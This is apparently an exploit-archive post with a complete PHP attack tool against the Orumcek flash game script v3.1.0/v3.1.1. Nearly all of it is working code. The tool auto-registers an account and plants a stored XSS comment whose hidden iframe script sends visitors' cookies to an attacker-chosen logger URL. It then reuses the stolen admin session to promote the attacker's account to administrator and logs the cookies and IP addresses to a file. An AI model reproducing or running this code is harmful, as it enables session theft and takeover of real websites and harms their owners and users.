# Exploit Title: rmcek flash oyun v3.1.1 & v3.1.0 XSS & CSRF Vulnerability
# Google Dork: ©2010 - 2013 cretsiz Flash Oyun Scripti kullanılarak hazırlanmıtır.
# Date: 08.06.2013
# Exploit Author: FreWaL | frewal@frewal.net
# Vendor Homepage: http://www.orumcekoyun.com/
# Software Link: http://orumcekoyun.com/surumler.html
# Version: v3.1.1(latest) & v3.1.0
##########################################################
# Exploit Video : http://www.youtube.com/watch?v=mu4uFBhhv68&feature=youtu.be
##########################################################
# Dr.Ly0n & FreWaL --> http://frewals.blogspot.com
##########################################################
Create one file name is : yazdim.html chmod 777 .
its Exploit function
automatic register website and automatic craate exploit and automatic send ...
its exploit & sniffer.. Please follow the exploit's video
##########################################################
Bir dosya olusturun ve adini : yazdim.html yapin chmod 777 verin.
Bu exploitin islevi
otomatik kayit olur otomatik exploiti olusturur ve admine gonderir.
bu hem exploit hemde sniffer gorevi gorur. Lutfen exploit videosunu izleyiniz.
##########################################################
its video gir.php exploit ...
<?php
/*
Coded by FreWaL & Dr.Ly0n
For Angelz Co.
http://frewals.blogspot.com
*/
$cookie = $_GET['fw'];
$u1 = $_GET['u1'];
$u2 = $_GET['u2'];
$ip = $_SERVER['REMOTE_ADDR'];
$ilk = explode('&',$cookie);
$sonx = $ilk[1];
$son1 = $ilk[2];
$bolbi = explode("|",urldecode($ilk[0]));
$tamurl = explode("http://",$bolbi[0]);
$tamurlx = explode("/",$tamurl[1]);
$tamurlz = $tamurlx[0];
$kids = explode("=",$sonx);
$kidi = $kids[1];
$ozbo = explode("panel",$bolbi[0]);
$sifirURL = trim($ozbo[0]);
$loggerURLz = '';
function exploitUygula($getirverbaga, $logURL){
$dosya = 'http://'.$getirverbaga.'/panel/js/tiny_mce/tiny_mce.js';
$kontrol = @fopen($dosya , "r");
if ($kontrol) {
$rakam = rand(100,999);
$kadi = 'ayse'.$rakam ;
$mail = 'ayse'.$rakam.'%40hotmail.com';
$pass = 'frewal';
$fwdr1 = curl_init();
curl_setopt($fwdr1, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=register');
curl_setopt($fwdr1, CURLOPT_POSTFIELDS,'isim=Ayse&soyisim=Sonmez&gun=1&ay=1&yil=1992&email='.$mail.'&kadi='.$kadi.'&password='.$pass.'&cpassword='.$pass.'&capchacevap=40&Submit=Kabul+%2F+%C3%9Cye+Ol');
curl_setopt($fwdr1, CURLOPT_POST, 1);
curl_setopt($fwdr1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdr1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdr1, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/index.php?do=register');
curl_setopt($fwdr1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdr1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdr1, CURLOPT_SSL_VERIFYHOST, 0);
$uyelik=curl_exec($fwdr1);
curl_close($fwdr1);
$postx = 'kadi='.$kadi.'&password='.$pass.'&Submit=G%C4%B0R%C4%B0%C5%9E+YAP';
$fwdr2 = curl_init();
curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=login');
//curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/do-login.php?kadi='.$kadi.'&sifre='.$pass.'');
curl_setopt($fwdr2, CURLOPT_POSTFIELDS,$postx);
curl_setopt($fwdr2, CURLOPT_POST, 1);
curl_setopt($fwdr2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdr2, CURLOPT_HEADER, 1);
curl_setopt($fwdr2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdr2, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/do-login.php');
curl_setopt($fwdr2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdr2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdr2, CURLOPT_SSL_VERIFYHOST, 0);
$uyelik1=curl_exec($fwdr2);
curl_close($fwdr2);
//echo $uyelik1.'<br>';
$ids = explode("ORUMCEK_MEMBER_ID=",$uyelik1);
$soid = explode(";",end($ids));
$hashi = explode("ORUMCEK_HASH=",$uyelik1);
$hashi1 = explode(";",end($hashi));
$ORUMCEK_MEMBER_ID = trim($soid[0]);
$ORUMCEK_ADMIN = '0';
$ORUMCEK_LOGIN_NAME = $kadi;
$ORUMCEK_HASH = trim($hashi1[0]);
$ORUMCEK_PASSWD = md5($pass);
$cookies = 'ORUMCEK_MEMBER_ID='.$ORUMCEK_MEMBER_ID.'; ORUMCEK_ADMIN='.$ORUMCEK_ADMIN.'; ORUMCEK_LOGIN_NAME='.$ORUMCEK_LOGIN_NAME.'; ORUMCEK_HASH='.$ORUMCEK_HASH.'; ORUMCEK_PASSWD='.$ORUMCEK_PASSWD.'';
echo $cookies.'<br>';
echo '-> islem tamamlandi !! -> complete!!';
$postverisi = 'yorumekle=yorumekle&oyunid=1&yorumotomatikonay=0&capchacevap=7&yorum=%3Cp%3EBence+s%26uuml%3Bper+oyun+herkese+tavsiye+ediyorum!+te%C5%9Fekk%26uuml%3Brler+admin...%3C%2Fp%3E%0D%0A%3Cdiv+style%3D%22display%3A+none%3B%22%3E%3Ciframe+id%3D%22iframe_ooyun%22+frameborder%3D%22100%22+scrolling%3D%22no%22+width%3D%220%22+height%3D%220%22%3E%3C%2Fiframe%3E%3C%2Fdiv%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C!%5BCDATA%5B%0D%0Avar++urlMbenim+%3D+%22'.$logURL.'%3Ffw%3D%22%3B%0D%0A%09var+data+%3D+escape(document.URL)+%2B+%22%7C%22+%2B+escape(document.cookie)+%2B+%22%26kidi%3D'.$ORUMCEK_MEMBER_ID.'%26kadi%3D'.$ORUMCEK_LOGIN_NAME.'%22%3B%0D%0A++++document.getElementById(%22iframe_ooyun%22).src+%3D+urlMbenim+%2B+escape(data)%3B%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E';
$fwdrsn = curl_init();
curl_setopt($fwdrsn, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/uyeislem.php');
curl_setopt($fwdrsn, CURLOPT_POSTFIELDS,$postverisi);
curl_setopt($fwdrsn, CURLOPT_POST, 1);
curl_setopt($fwdrsn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdrsn, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdrsn, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/uyeislem.php');
curl_setopt($fwdrsn, CURLOPT_HTTPHEADER, array("Content-Type: application/x-www-form-urlencoded; charset=UTF-8","Cookie: $cookies"));
curl_setopt($fwdrsn, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYHOST, 0);
$gelss=curl_exec($fwdrsn);
curl_close($fwdrsn);
#################################
} else {
echo "Bu versiyon bu acik icin uyumlu degildir !! , This version is not compatible to the open";
}
#################################
}
if($cookie != ""){
$gelss = file_get_contents('yazdim.html');
if(strstr($gelss,$tamurlz)){
//echo 'var';
}else{
$fwdr = curl_init();
curl_setopt($fwdr, CURLOPT_URL, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.'');
curl_setopt($fwdr, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdr, CURLOPT_REFERER, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.'');
curl_setopt($fwdr, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded','Cookie: '.trim($bolbi[1]).''));
curl_setopt($fwdr, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdr, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdr, CURLOPT_SSL_VERIFYHOST, 0);
$gel=curl_exec($fwdr);
curl_close($fwdr);
$frewalgelen=fopen("yazdim.html","a");
fwrite($frewalgelen,'<hr color=#000000;>
<u><font face="verdana" size="-2">Cookiler
</font></u><font face=verdana size=-2>
<u>:</u> <b>'.$bolbi[1].'</b><br>
<u>Site
:</u> <b>'.$bolbi[0].'</b></br>
<u>Senin Ekledigin Admin
:</u> <b>Your UserID-UserName->'.$sonx.'-'.$son1.' Default Sifre( Password ) : frewal</b></br>
<u>IP Adresi :</u> <b>'.$ip.'</b><br>
<hr color=#000000;>
</font>');
}
}else{
echo '
<br>ornek hedef / sample viktim : www.google.com/orumcekoyunpath<br>
<br>ornek log dosyasi / sample LogURL : http://asdf.com/log.php<br>
<form method="GET" action="">
<p>Victim Site : <input type="text" name="u1" value="" size="47"></p>
<p>Logger URL :<input type="text" name="u2" value="'.$loggerURLz.'" size="47"></p>
<p><input type="submit" value="Pompala | Sennnnddd :))" name="B1"></p>
</form>
';
}
if($u1 != ""){
echo exploitUygula($u1, $u2);
}
?>